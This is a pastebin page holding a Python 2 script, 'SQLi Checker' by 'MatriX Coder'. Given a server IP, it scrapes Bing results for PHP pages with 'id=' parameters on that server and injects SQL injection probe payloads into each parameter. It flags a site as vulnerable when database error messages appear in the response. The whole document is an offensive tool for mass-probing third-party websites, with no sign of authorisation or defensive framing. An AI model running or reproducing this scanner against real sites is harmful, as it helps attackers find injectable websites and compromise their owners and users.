SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/env python | |
2 | ||
3 | # server websites sqli injection checker | |
4 | # v1.2 detecting parameters | |
5 | # Got Some codes and ideas from WebPwn3r Project (a good one) | |
6 | ||
7 | import urllib2 , os , sys , re | |
8 | from platform import system | |
9 | ||
10 | class colors(): | |
11 | PURPLE = '\033[95m' | |
12 | CYAN = '\033[96m' | |
13 | DARKCYAN = '\033[36m' | |
14 | BLUE = '\033[94m' | |
15 | GREEN = '\033[92m' | |
16 | YELLOW = '\033[93m' | |
17 | RED = '\033[91m' | |
18 | ENDC = '\033[0m' | |
19 | ||
20 | if system() == 'Linux': | |
21 | os.system('clear') | |
22 | if system() == 'Windows': | |
23 | os.system('cls') | |
24 | ||
25 | logo = ''' | |
26 | _____ ____ __ _ | |
27 | / ___// __ \ / / (_) | ----| SQLi Checker |---- | |
28 | \__ \/ / / / / / / / | Autohr : MatriX Coder | |
29 | ___/ / /_/ / / /___/ / | FB : www.fb.com/matrixcoder2 | |
30 | /____/\___\_\/_____/_/ | Blog : www.matrixcoder.co.vu | |
31 | ||
32 | ||
33 | ''' | |
34 | ||
35 | print(colors.BLUE + logo + colors.ENDC) | |
36 | ||
37 | try: | |
38 | lista = [] | |
39 | payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] | |
40 | check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I) | |
41 | s = sys.argv[1] | |
42 | page = 1 | |
43 | print('\n') | |
44 | while page <= 101: | |
45 | bing = "http://www.bing.com/search?q=ip%3A"+s+"+php?id=&count=50&first="+str(page) | |
46 | openbing = urllib2.urlopen(bing) | |
47 | readbing = openbing.read() | |
48 | findwebs = re.findall('<h2><a href="(.*?)"' , readbing) | |
49 | for i in range(len(findwebs)): | |
50 | x = findwebs[i] | |
51 | lista.append(x) | |
52 | ||
53 | page = page + 50 | |
54 | for site in lista: | |
55 | vulnz = [] | |
56 | try: | |
57 | for param in site.split('?')[1].split('&'): | |
58 | for payload in payloads: | |
59 | pows = site.replace(param , param + payload.strip()) | |
60 | print pows | |
61 | html = urllib2.urlopen(pows).readlines() | |
62 | for line in html: | |
63 | checker = re.findall(check , line) | |
64 | if len(checker) != 0 and site not in vulnz: | |
65 | vulnz.append(site) | |
66 | print colors.GREEN + '\nSQLi Found ==> %s\n' % site + colors.ENDC | |
67 | except: | |
68 | pass | |
69 | ||
70 | except IndexError: | |
71 | print "[*] Usage : python "+sys.argv[0]+" 127.0.0.1" |